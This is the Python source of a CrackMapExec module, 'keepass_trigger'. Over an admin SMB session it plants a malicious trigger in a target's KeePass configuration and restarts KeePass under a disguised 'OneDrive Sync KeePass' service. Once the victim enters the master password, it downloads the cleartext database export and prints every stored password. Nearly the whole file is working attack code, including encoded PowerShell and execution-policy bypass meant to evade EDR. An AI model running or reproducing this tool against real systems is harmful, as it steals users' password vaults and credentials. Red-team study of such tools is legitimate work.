419 lines
24 KiB
Python
419 lines
24 KiB
Python
import os
|
|
import sys
|
|
import json
|
|
from xmltodict import parse
|
|
from time import sleep
|
|
from csv import reader
|
|
from base64 import b64encode
|
|
from io import BytesIO, StringIO
|
|
from xml.etree import ElementTree
|
|
from cme.helpers.powershell import get_ps_script
|
|
|
|
|
|
class CMEModule:
|
|
"""
|
|
Make use of KeePass' trigger system to export the database in cleartext
|
|
References: https://keepass.info/help/v2/triggers.html
|
|
https://web.archive.org/web/20211017083926/http://www.harmj0y.net:80/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
|
|
|
|
Module by @d3lb3, inspired by @harmj0y work
|
|
"""
|
|
|
|
name = "keepass_trigger"
|
|
description = "Set up a malicious KeePass trigger to export the database in cleartext."
|
|
supported_protocols = ["smb"]
|
|
# while the module only executes legit powershell commands on the target (search and edit files)
|
|
# some EDR like Trend Micro flag base64-encoded powershell as malicious
|
|
# the option PSH_EXEC_METHOD can be used to avoid such execution, and will drop scripts on the target
|
|
opsec_safe = False
|
|
multiple_hosts = False
|
|
|
|
def __init__(self):
|
|
# module options
|
|
self.action = None
|
|
self.keepass_config_path = None
|
|
self.keepass_user = None
|
|
self.export_name = "export.xml"
|
|
self.export_path = "C:\\Users\\Public"
|
|
self.powershell_exec_method = "PS1"
|
|
|
|
# additional parameters
|
|
self.share = "C$"
|
|
self.remote_temp_script_path = "C:\\Windows\\Temp\\temp.ps1"
|
|
self.keepass_binary_path = "C:\\Program Files\\KeePass Password Safe 2\\KeePass.exe"
|
|
self.local_export_path = "/tmp"
|
|
self.trigger_name = "export_database"
|
|
self.poll_frequency_seconds = 5
|
|
self.dummy_service_name = "OneDrive Sync KeePass"
|
|
|
|
with open(get_ps_script("keepass_trigger_module/RemoveKeePassTrigger.ps1"), "r") as remove_trigger_script_file:
|
|
self.remove_trigger_script_str = remove_trigger_script_file.read()
|
|
|
|
with open(get_ps_script("keepass_trigger_module/AddKeePassTrigger.ps1"), "r") as add_trigger_script_file:
|
|
self.add_trigger_script_str = add_trigger_script_file.read()
|
|
|
|
with open(get_ps_script("keepass_trigger_module/RestartKeePass.ps1"), "r") as restart_keepass_script_file:
|
|
self.restart_keepass_script_str = restart_keepass_script_file.read()
|
|
|
|
def options(self, context, module_options):
|
|
"""
|
|
ACTION (mandatory) Performs one of the following actions, specified by the user:
|
|
ADD insert a new malicious trigger into KEEPASS_CONFIG_PATH's specified file
|
|
CHECK check if a malicious trigger is currently set in KEEPASS_CONFIG_PATH's
|
|
specified file
|
|
RESTART restart KeePass using a Windows service (used to force trigger reload),
|
|
if multiple KeePass process are running, rely on USER option
|
|
POLL search for EXPORT_NAME file in EXPORT_PATH folder
|
|
(until found, or manually exited by the user)
|
|
CLEAN remove malicious trigger from KEEPASS_CONFIG_PATH as well as database
|
|
export files from EXPORT_PATH
|
|
ALL performs ADD, CHECK, RESTART, POLL, CLEAN actions one after the other
|
|
|
|
KEEPASS_CONFIG_PATH Path of the remote KeePass configuration file where to add a malicious trigger
|
|
(used by ADD, CHECK and CLEAN actions)
|
|
USER Targeted user running KeePass, used to restart the appropriate process
|
|
(used by RESTART action)
|
|
|
|
EXPORT_NAME Name fo the database export file, default: export.xml
|
|
EXPORT_PATH Path where to export the KeePass database in cleartext
|
|
default: C:\\Users\\Public, %APPDATA% works well too for user permissions
|
|
|
|
PSH_EXEC_METHOD Powershell execution method, may avoid detections depending on the AV/EDR in use
|
|
(while no 'malicious' command is executed):
|
|
ENCODE run scripts through encoded oneliners
|
|
PS1 run scripts through a file dropped in C:\\Windows\\Temp (default)
|
|
|
|
Not all variables used by the module are available as options (ex: trigger name, temp folder path, etc.),
|
|
but they can still be easily edited in the module __init__ code if needed
|
|
"""
|
|
|
|
if "ACTION" in module_options:
|
|
if module_options["ACTION"] not in [
|
|
"ADD",
|
|
"CHECK",
|
|
"RESTART",
|
|
"SINGLE_POLL",
|
|
"POLL",
|
|
"CLEAN",
|
|
"ALL",
|
|
]:
|
|
context.log.fail("Unrecognized action, use --options to list available parameters")
|
|
exit(1)
|
|
else:
|
|
self.action = module_options["ACTION"]
|
|
else:
|
|
context.log.fail("Missing ACTION option, use --options to list available parameters")
|
|
exit(1)
|
|
|
|
if "KEEPASS_CONFIG_PATH" in module_options:
|
|
self.keepass_config_path = module_options["KEEPASS_CONFIG_PATH"]
|
|
|
|
if "USER" in module_options:
|
|
self.keepass_user = module_options["USER"]
|
|
|
|
if "EXPORT_NAME" in module_options:
|
|
self.export_name = module_options["EXPORT_NAME"]
|
|
|
|
if "EXPORT_PATH" in module_options:
|
|
self.export_path = module_options["EXPORT_PATH"]
|
|
|
|
if "PSH_EXEC_METHOD" in module_options:
|
|
if module_options["PSH_EXEC_METHOD"] not in ["ENCODE", "PS1"]:
|
|
context.log.fail("Unrecognized powershell execution method, use --options to list available parameters")
|
|
exit(1)
|
|
else:
|
|
self.powershell_exec_method = module_options["PSH_EXEC_METHOD"]
|
|
|
|
def on_admin_login(self, context, connection):
|
|
if self.action == "ADD":
|
|
self.add_trigger(context, connection)
|
|
elif self.action == "CHECK":
|
|
self.check_trigger_added(context, connection)
|
|
elif self.action == "RESTART":
|
|
self.restart(context, connection)
|
|
elif self.action == "POLL":
|
|
self.poll(context, connection)
|
|
elif self.action == "CLEAN":
|
|
self.clean(context, connection)
|
|
self.restart(context, connection)
|
|
elif self.action == "ALL":
|
|
self.all_in_one(context, connection)
|
|
|
|
def add_trigger(self, context, connection):
|
|
"""Add a malicious trigger to a remote KeePass config file using the powershell script AddKeePassTrigger.ps1"""
|
|
|
|
# check if the specified KeePass configuration file exists
|
|
if self.trigger_added(context, connection):
|
|
context.log.display(f"The specified configuration file {self.keepass_config_path} already contains a trigger called '{self.trigger_name}', skipping")
|
|
return
|
|
|
|
context.log.display(f"Adding trigger '{self.trigger_name}' to '{self.keepass_config_path}'")
|
|
|
|
# prepare the trigger addition script based on user-specified parameters (e.g: trigger name, etc)
|
|
# see data/keepass_trigger_module/AddKeePassTrigger.ps1 for the full script
|
|
self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_ExportPath", self.export_path)
|
|
self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_ExportName", self.export_name)
|
|
self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_TriggerName", self.trigger_name)
|
|
self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_KeePassXMLPath", self.keepass_config_path)
|
|
|
|
# add the malicious trigger to the remote KeePass configuration file
|
|
if self.powershell_exec_method == "ENCODE":
|
|
add_trigger_script_b64 = b64encode(self.add_trigger_script_str.encode("UTF-16LE")).decode("utf-8")
|
|
add_trigger_script_cmd = f"powershell.exe -e {add_trigger_script_b64}"
|
|
connection.execute(add_trigger_script_cmd)
|
|
sleep(2) # as I noticed some delay may happen with the encoded powershell command execution
|
|
elif self.powershell_exec_method == "PS1":
|
|
try:
|
|
self.put_file_execute_delete(context, connection, self.add_trigger_script_str)
|
|
except Exception as e:
|
|
context.log.fail(f"Error while adding malicious trigger to file: {e}")
|
|
sys.exit(1)
|
|
|
|
# checks if the malicious trigger was effectively added to the specified KeePass configuration file
|
|
if self.trigger_added(context, connection):
|
|
context.log.success(f"Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files")
|
|
else:
|
|
context.log.fail(f"Unknown error when adding malicious trigger to file")
|
|
sys.exit(1)
|
|
|
|
def check_trigger_added(self, context, connection):
|
|
"""check if the trigger is added to the config file XML tree"""
|
|
|
|
if self.trigger_added(context, connection):
|
|
context.log.display(f"Malicious trigger '{self.trigger_name}' found in '{self.keepass_config_path}'")
|
|
else:
|
|
context.log.display(f"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}'")
|
|
|
|
def restart(self, context, connection):
|
|
"""Force the restart of KeePass process using a Windows service defined using the powershell script RestartKeePass.ps1
|
|
If multiple process belonging to different users are running simultaneously,
|
|
relies on the USER option to choose which one to restart"""
|
|
|
|
# search for keepass processes
|
|
search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
|
|
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)
|
|
# we return the powershell command as a CSV for easier column parsing
|
|
csv_reader = reader(search_keepass_process_output_csv.split("\n"), delimiter=",")
|
|
next(csv_reader) # to skip the header line
|
|
keepass_process_list = list(csv_reader)
|
|
# check if multiple processes belonging to different users are running (in order to choose which one to restart)
|
|
keepass_users = []
|
|
for process in keepass_process_list:
|
|
keepass_users.append(process[1])
|
|
if len(keepass_users) == 0:
|
|
context.log.fail("No running KeePass process found, aborting restart")
|
|
return
|
|
elif len(keepass_users) == 1: # if there is only 1 KeePass process running
|
|
# if KEEPASS_USER option is specified then we check if the user matches
|
|
if self.keepass_user and (keepass_users[0] != self.keepass_user and keepass_users[0].split("\\")[1] != self.keepass_user):
|
|
context.log.fail(f"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart")
|
|
return
|
|
else:
|
|
self.keepass_user = keepass_users[0]
|
|
elif len(keepass_users) > 1 and self.keepass_user:
|
|
found_user = False # we search through every KeePass process owner for the specified user
|
|
for user in keepass_users:
|
|
if user == self.keepass_user or user.split("\\")[1] == self.keepass_user:
|
|
self.keepass_user = keepass_users[0]
|
|
found_user = True
|
|
if not found_user:
|
|
context.log.fail(f"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart")
|
|
return
|
|
else:
|
|
context.log.fail("Multiple KeePass processes were found, please specify parameter USER to target one")
|
|
return
|
|
|
|
context.log.display("Restarting {}'s KeePass process".format(keepass_users[0]))
|
|
|
|
# prepare the restarting script based on user-specified parameters (e.g: keepass user, etc)
|
|
# see data/keepass_trigger_module/RestartKeePass.ps1
|
|
self.restart_keepass_script_str = self.restart_keepass_script_str.replace("REPLACE_ME_KeePassUser", self.keepass_user)
|
|
self.restart_keepass_script_str = self.restart_keepass_script_str.replace("REPLACE_ME_KeePassBinaryPath", self.keepass_binary_path)
|
|
self.restart_keepass_script_str = self.restart_keepass_script_str.replace("REPLACE_ME_DummyServiceName", self.dummy_service_name)
|
|
|
|
# actually performs the restart on the remote target
|
|
if self.powershell_exec_method == "ENCODE":
|
|
restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode("UTF-16LE")).decode("utf-8")
|
|
restart_keepass_script_cmd = "powershell.exe -e {}".format(restart_keepass_script_b64)
|
|
connection.execute(restart_keepass_script_cmd)
|
|
elif self.powershell_exec_method == "PS1":
|
|
try:
|
|
self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)
|
|
except Exception as e:
|
|
context.log.fail("Error while restarting KeePass: {}".format(e))
|
|
return
|
|
|
|
def poll(self, context, connection):
|
|
"""Search for the cleartext database export file in the specified export folder
|
|
(until found, or manually exited by the user)"""
|
|
found = False
|
|
context.log.display(f"Polling for database export every {self.poll_frequency_seconds} seconds, please be patient")
|
|
context.log.display("we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything")
|
|
# if the specified path is %APPDATA%, we need to check in every user's folder
|
|
if self.export_path == "%APPDATA%" or self.export_path == "%appdata%":
|
|
poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format(self.export_name)
|
|
else:
|
|
export_full_path = f"'{self.export_path}\\{self.export_name}'"
|
|
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
|
|
|
|
# we poll every X seconds until the export path is found on the remote machine
|
|
while not found:
|
|
poll_exports_command_output = connection.execute(poll_export_command_str, True)
|
|
if self.export_name not in poll_exports_command_output:
|
|
print(".", end="", flush=True)
|
|
sleep(self.poll_frequency_seconds)
|
|
continue
|
|
print("")
|
|
|
|
# once a database is found, downloads it to the attackers machine
|
|
context.log.success("Found database export !")
|
|
# in case multiple exports found (may happen if several users exported the database to their APPDATA)
|
|
for count, export_path in enumerate(poll_exports_command_output.split("\r\n")):
|
|
try:
|
|
buffer = BytesIO()
|
|
connection.conn.getFile(self.share, export_path.split(":")[1], buffer.write)
|
|
|
|
# if multiple exports found, add a number at the end of local path to prevent override
|
|
if count > 0:
|
|
local_full_path = self.local_export_path + "/" + self.export_name.split(".")[0] + "_" + str(count) + "." + self.export_name.split(".")[1]
|
|
else:
|
|
local_full_path = self.local_export_path + "/" + self.export_name
|
|
|
|
# downloads the exported database
|
|
with open(local_full_path, "wb") as f:
|
|
f.write(buffer.getbuffer())
|
|
remove_export_command_str = "powershell.exe Remove-Item {}".format(export_path)
|
|
connection.execute(remove_export_command_str, True)
|
|
context.log.success('Moved remote "{}" to local "{}"'.format(export_path, local_full_path))
|
|
found = True
|
|
except Exception as e:
|
|
context.log.fail("Error while polling export files, exiting : {}".format(e))
|
|
|
|
def clean(self, context, connection):
|
|
"""Checks for database export + malicious trigger on the remote host, removes everything"""
|
|
# if the specified path is %APPDATA%, we need to check in every user's folder
|
|
if self.export_path == "%APPDATA%" or self.export_path == "%appdata%":
|
|
poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format(self.export_name)
|
|
else:
|
|
export_full_path = f"'{self.export_path}\\{self.export_name}'"
|
|
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
|
|
poll_export_command_output = connection.execute(poll_export_command_str, True)
|
|
|
|
# deletes every export found on the remote machine
|
|
if self.export_name in poll_export_command_output:
|
|
# in case multiple exports found (may happen if several users exported the database to their APPDATA)
|
|
for export_path in poll_export_command_output.split("\r\n"):
|
|
context.log.display(f"Database export found in '{export_path}', removing")
|
|
remove_export_command_str = f"powershell.exe Remove-Item {export_path}"
|
|
connection.execute(remove_export_command_str, True)
|
|
else:
|
|
context.log.display(f"No export found in {self.export_path} , everything is cleaned")
|
|
|
|
# if the malicious trigger was not self-deleted, deletes it
|
|
if self.trigger_added(context, connection):
|
|
# prepare the trigger deletion script based on user-specified parameters (e.g: trigger name, etc)
|
|
# see data/keepass_trigger_module/RemoveKeePassTrigger.ps1
|
|
self.remove_trigger_script_str = self.remove_trigger_script_str.replace("REPLACE_ME_KeePassXMLPath", self.keepass_config_path)
|
|
self.remove_trigger_script_str = self.remove_trigger_script_str.replace("REPLACE_ME_TriggerName", self.trigger_name)
|
|
|
|
# actually performs trigger deletion
|
|
if self.powershell_exec_method == "ENCODE":
|
|
remove_trigger_script_b64 = b64encode(self.remove_trigger_script_str.encode("UTF-16LE")).decode("utf-8")
|
|
remove_trigger_script_command_str = f"powershell.exe -e {remove_trigger_script_b64}"
|
|
connection.execute(remove_trigger_script_command_str, True)
|
|
elif self.powershell_exec_method == "PS1":
|
|
try:
|
|
self.put_file_execute_delete(context, connection, self.remove_trigger_script_str)
|
|
except Exception as e:
|
|
context.log.fail(f"Error while deleting trigger, exiting: {e}")
|
|
sys.exit(1)
|
|
|
|
# check if the specified KeePass configuration file does not contain the malicious trigger anymore
|
|
if self.trigger_added(context, connection):
|
|
context.log.fail(f"Unknown error while removing trigger '{self.trigger_name}', exiting")
|
|
else:
|
|
context.log.display(f"Found trigger '{self.trigger_name}' in configuration file, removing")
|
|
else:
|
|
context.log.success(f"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}', skipping")
|
|
|
|
def all_in_one(self, context, connection):
|
|
"""Performs ADD, RESTART, POLL and CLEAN actions one after the other"""
|
|
context.log.highlight("")
|
|
self.add_trigger(context, connection)
|
|
context.log.highlight("")
|
|
self.restart(context, connection)
|
|
self.poll(context, connection)
|
|
context.log.highlight("")
|
|
context.log.display("Cleaning everything...")
|
|
self.clean(context, connection)
|
|
self.restart(context, connection)
|
|
context.log.highlight("")
|
|
context.log.display("Extracting password...")
|
|
self.extract_password(context)
|
|
|
|
def trigger_added(self, context, connection):
|
|
"""check if the trigger is added to the config file XML tree (returns True/False)"""
|
|
# check if the specified KeePass configuration file exists
|
|
if not self.keepass_config_path:
|
|
context.log.fail("No KeePass configuration file specified, exiting")
|
|
sys.exit(1)
|
|
|
|
try:
|
|
buffer = BytesIO()
|
|
connection.conn.getFile(self.share, self.keepass_config_path.split(":")[1], buffer.write)
|
|
except Exception as e:
|
|
context.log.fail(f"Error while getting file '{self.keepass_config_path}', exiting: {e}")
|
|
sys.exit(1)
|
|
|
|
try:
|
|
keepass_config_xml_root = ElementTree.fromstring(buffer.getvalue())
|
|
except Exception as e:
|
|
context.log.fail(f"Error while parsing file '{self.keepass_config_path}', exiting: {e}")
|
|
sys.exit(1)
|
|
|
|
# check if the specified KeePass configuration file does not already contain the malicious trigger
|
|
for trigger in keepass_config_xml_root.findall(".//Application/TriggerSystem/Triggers/Trigger"):
|
|
if trigger.find("Name").text == self.trigger_name:
|
|
return True
|
|
|
|
return False
|
|
|
|
def put_file_execute_delete(self, context, connection, psh_script_str):
|
|
"""Helper to upload script to a temporary folder, run then deletes it"""
|
|
script_str_io = StringIO(psh_script_str)
|
|
connection.conn.putFile(self.share, self.remote_temp_script_path.split(":")[1], script_str_io.read)
|
|
script_execute_cmd = "powershell.exe -ep Bypass -F {}".format(self.remote_temp_script_path)
|
|
connection.execute(script_execute_cmd, True)
|
|
remove_remote_temp_script_cmd = 'powershell.exe "Remove-Item "{}""'.format(self.remote_temp_script_path)
|
|
connection.execute(remove_remote_temp_script_cmd)
|
|
|
|
def extract_password(self, context):
|
|
xml_doc_path = os.path.abspath(self.local_export_path + "/" + self.export_name)
|
|
xml_tree = ElementTree.parse(xml_doc_path)
|
|
root = xml_tree.getroot()
|
|
to_string = ElementTree.tostring(root, encoding="UTF-8", method="xml")
|
|
xml_to_dict = parse(to_string)
|
|
dump = json.dumps(xml_to_dict)
|
|
obj = json.loads(dump)
|
|
|
|
if len(obj["KeePassFile"]["Root"]["Group"]["Entry"]):
|
|
for obj2 in obj["KeePassFile"]["Root"]["Group"]["Entry"]:
|
|
for password in obj2["String"]:
|
|
if password["Key"] == "Password":
|
|
context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]["#text"]))
|
|
else:
|
|
context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]))
|
|
context.log.highlight("")
|
|
if len(obj["KeePassFile"]["Root"]["Group"]["Group"]):
|
|
for obj2 in obj["KeePassFile"]["Root"]["Group"]["Group"]:
|
|
try:
|
|
for obj3 in obj2["Entry"]:
|
|
for password in obj3["String"]:
|
|
if password["Key"] == "Password":
|
|
context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]["#text"]))
|
|
else:
|
|
context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]))
|
|
context.log.highlight("")
|
|
except KeyError:
|
|
pass
|